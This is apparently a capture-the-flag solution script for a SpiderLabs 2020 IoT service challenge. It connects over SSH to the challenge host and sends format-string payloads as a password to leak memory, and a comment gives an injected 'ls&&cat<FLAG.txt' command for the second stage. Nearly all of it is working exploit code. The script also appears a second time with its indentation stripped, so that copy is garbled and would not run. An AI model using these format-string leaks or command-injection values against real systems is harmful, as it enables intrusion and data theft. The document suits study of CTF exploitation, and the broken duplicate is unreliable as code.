c3l3si4n/Remote_IoT_Service_SpiderLabs_2020.py

## Remote_IoT_Service_SpiderLabs_2020.py
"""
First part: Leaking password
"""

import paramiko
from time import sleep
import sys
from pwn import p64

def test_password(password):
    try:
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect('spiderlabsctf.com', username='console', password='console', port=3232)
        buff = b""
        s = ssh.invoke_shell()
        s.settimeout(5.0)
        s.send(f'{password}\n'.encode())
        empty_counter = 0
        while not buff.endswith(b'valid password\r\n'):
            resp = s.recv(8)
            if resp == '':
                empty_counter += 1
            if empty_counter > 50:
                return b'.'
            buff += resp
        return buff
    except Exception:
        raise

def leak_offset(index, string=False, pointer=False):
    payload = ""
    if string:
        payload = "%" + str(index) + "$s"
    else:
        payload = "AB"+ "%" + str(index) + "$p"
    while True:
        try:
            leak = test_password(payload)
            break
        except Exception :
            pass
    leak = leak.split(b"\r\n")[-2]
    leak = leak.split(b" ")[0]
    leak = leak[2:]
    if leak.startswith(b"0x"):
        leak = p64(int(leak, 16))
#    leak = bytes.fromhex(leak.decode())
    return leak


base = ""
for offset in range(0,1000000):
    leak = leak_offset(offset)
    sys.stdout.write(leak)
    sys.stdout.flush()


"""
For the second part this payload can be used to get the flag.
ls&&cat<FLAG.txt
"""
	"""
	First part: Leaking password
	"""

	import paramiko
	from time import sleep
	import sys
	from pwn import p64

	def test_password(password):
	try:
	ssh = paramiko.SSHClient()
	ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
	ssh.connect('spiderlabsctf.com', username='console', password='console', port=3232)
	buff = b""
	s = ssh.invoke_shell()
	s.settimeout(5.0)
	s.send(f'{password}\n'.encode())
	empty_counter = 0
	while not buff.endswith(b'valid password\r\n'):
	resp = s.recv(8)
	if resp == '':
	empty_counter += 1
	if empty_counter > 50:
	return b'.'
	buff += resp
	return buff
	except Exception:
	raise

	def leak_offset(index, string=False, pointer=False):
	payload = ""
	if string:
	payload = "%" + str(index) + "$s"
	else:
	payload = "AB"+ "%" + str(index) + "$p"
	while True:
	try:
	leak = test_password(payload)
	break
	except Exception :
	pass
	leak = leak.split(b"\r\n")[-2]
	leak = leak.split(b" ")[0]
	leak = leak[2:]
	if leak.startswith(b"0x"):
	leak = p64(int(leak, 16))
	# leak = bytes.fromhex(leak.decode())
	return leak


	base = ""
	for offset in range(0,1000000):
	leak = leak_offset(offset)
	sys.stdout.write(leak)
	sys.stdout.flush()


	"""
	For the second part this payload can be used to get the flag.
	ls&&cat<FLAG.txt
	"""